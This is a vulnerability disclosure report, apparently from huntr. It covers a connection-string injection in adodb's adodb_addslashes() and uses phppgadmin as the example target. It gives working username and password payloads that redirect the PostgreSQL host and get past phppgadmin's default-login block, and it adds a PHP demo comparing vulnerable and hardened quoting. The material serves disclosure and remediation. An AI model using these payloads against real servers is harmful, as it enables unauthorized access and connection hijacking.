huntr report BDF5F216-4499-4225-A737-B28BC6F5801C
Reported by meme-lord in adodb/adodb
Oct 28, 2021 - 4:05 p.m. (2021-10-28 16:05:21)
www.huntr.dev

EPSS: 0.004 (Low), percentile 74.9%

Description

An attacker can inject values into the PostgreSQL connection string by bypassing adodb_addslashes().
The function can be bypassed, in phppgadmin for example, by wrapping the username in single quotes so that other connection parameters can be placed between the leading and trailing quote.

Proof of Concept

I’m going to use phppgadmin as an example of a project that this affects.

When a user logs in, the username and password are passed through this function before reaching pg_connect():

function adodb_addslashes($s)
{
	$len = strlen($s);
	if ($len == 0) return "''";
	// "Already quoted" shortcut: a value that starts and ends with a single
	// quote is returned verbatim, so nothing between those quotes is escaped.
	if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted

	return "'".addslashes($s)."'";
}

An attacker can log in with a username of: 'testinguser' host='1.3.3.7' and phppgadmin will log in, but be connected to 1.3.3.7.

Impact

In the context of phppgadmin, getting past the login panel opens up many more functions to exploit.
It can also reveal the backend IP of a server. I was unable to find anything other than the host parameter to inject into the connection string that was interesting.

This bypass also allows an attacker to use default logins that would otherwise be blocked in phppgadmin (the password part of the check here could be bypassed by using '' lol='' as a password):

// phppgadmin login check: the raw, unquoted username is compared against the
// list, and an empty password is rejected, before the connection string is built.
$bad_usernames = array('pgsql', 'postgres', 'root', 'administrator');
$username = strtolower($server_info['username']);

if ($server_info['password'] == '' || in_array($username, $bad_usernames)) {
	unset($_SESSION['webdbLogin'][$_REQUEST['server']]);
	$msg = $lang['strlogindisallowed'];
	include('./login.php');
	exit;
}
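To make both the proof of concept and the login-check bypass concrete, the following is an added example and not code from ADOdb or phppgadmin. It copies the vulnerable quoting function from the report, puts an always-escape-and-quote variant next to it, and runs both through a simplified model of how a driver assembles a libpq connection string and how libpq parses it back into keyword/value pairs. The fixed host name db.internal, the database name app, the key order host/user/password/dbname, and the parser (a subset of libpq's real grammar) are all assumptions made for the demonstration.

```php
<?php
// Added example (not adodb's or phppgadmin's code): a simplified model of how a
// libpq connection string is assembled and parsed, used to show why the
// "already quoted" shortcut in adodb_addslashes() lets a caller smuggle extra
// key=value pairs, and how an always-escape-and-quote variant prevents it.

// Copy of the vulnerable function from the report: input that already starts
// and ends with a single quote is trusted and returned verbatim, unescaped.
function adodb_addslashes_vulnerable($s)
{
    $len = strlen($s);
    if ($len == 0) return "''";
    if (strncmp($s, "'", 1) === 0 && substr($s, $len - 1) == "'") return $s;
    return "'" . addslashes($s) . "'";
}

// Hardened variant (example code, not the library's fix): every value is
// escaped and quoted, with no shortcut for values that look quoted already.
// Inside single quotes libpq treats backslash as the escape character, so
// escaping backslash and single quote is sufficient.
function quote_conninfo_value($s)
{
    return "'" . str_replace(array('\\', "'"), array('\\\\', "\\'"), $s) . "'";
}

// Simplified driver behaviour (assumption): a fixed host first, then the
// user-supplied credentials, then the database name.
function build_conninfo($quoter, $user, $password)
{
    return 'host=' . $quoter('db.internal')
        . ' user=' . $quoter($user)
        . ' password=' . $quoter($password)
        . ' dbname=' . $quoter('app');
}

// Minimal re-implementation of libpq's conninfo grammar (assumption: a subset
// of the real rules): keyword=value pairs separated by whitespace, values
// either unquoted (ending at whitespace) or single-quoted with backslash
// escapes. A keyword given twice keeps its last value, which is what lets an
// injected host= override the legitimate one.
function parse_conninfo($str)
{
    $ws = " \t\r\n";
    $opts = array();
    $len = strlen($str);
    $i = 0;
    while ($i < $len) {
        $i += strspn($str, $ws, $i);          // skip whitespace between pairs
        if ($i >= $len) break;
        $eq = strpos($str, '=', $i);
        if ($eq === false) throw new RuntimeException('missing "=" in connection string');
        $key = trim(substr($str, $i, $eq - $i));
        $i = $eq + 1;
        $i += strspn($str, $ws, $i);          // whitespace is allowed around "="
        $val = '';
        if ($i < $len && $str[$i] === "'") {
            $i++;                             // opening quote
            while ($i < $len && $str[$i] !== "'") {
                if ($str[$i] === '\\' && $i + 1 < $len) $i++; // backslash escapes next char
                $val .= $str[$i++];
            }
            if ($i >= $len) throw new RuntimeException('unterminated quoted value');
            $i++;                             // closing quote
        } elseif ($i < $len) {
            $end = $i + strcspn($str, $ws, $i);
            $val = substr($str, $i, $end - $i);
            $i = $end;
        }
        $opts[$key] = $val;
    }
    return $opts;
}

// The report's PoC username and password, parsed under each quoting strategy.
$user = "'testinguser' host='1.3.3.7'";
$pass = "'' lol=''";
echo "vulnerable: ", json_encode(parse_conninfo(build_conninfo('adodb_addslashes_vulnerable', $user, $pass))), "\n";
echo "hardened:   ", json_encode(parse_conninfo(build_conninfo('quote_conninfo_value', $user, $pass))), "\n";

// The phppgadmin check from the impact section compares the raw username, so a
// quoted "'postgres'" is not in the blocked list; whether it then reaches the
// server as the real role depends entirely on the quoter.
$blocked = array('pgsql', 'postgres', 'root', 'administrator');
$raw = "'postgres'";
foreach (array('adodb_addslashes_vulnerable', 'quote_conninfo_value') as $quoter) {
    $opts = parse_conninfo(build_conninfo($quoter, $raw, 'x'));
    printf("%s: blocked=%s effective role=%s\n", $quoter,
        in_array(strtolower($raw), $blocked) ? 'yes' : 'no', $opts['user']);
}
```

Run it with the php CLI. With the vulnerable quoter the parsed options end up with host set to 1.3.3.7, an empty password and a stray lol key, because the quoted username and password were pasted into the string unescaped and libpq let the later host= win. With the hardened quoter the host stays db.internal and the username and password arrive as single literal values, quotes and all. In the last loop both quoters let the quoted 'postgres' past in_array(), which is the check bypass the report describes; only the vulnerable quoter turns it into the real role name on the wire, while the hardened one delivers the literal string 'postgres' (with its quotes), which is not the blocked role. The fix therefore belongs in the quoting routine, not in the login check.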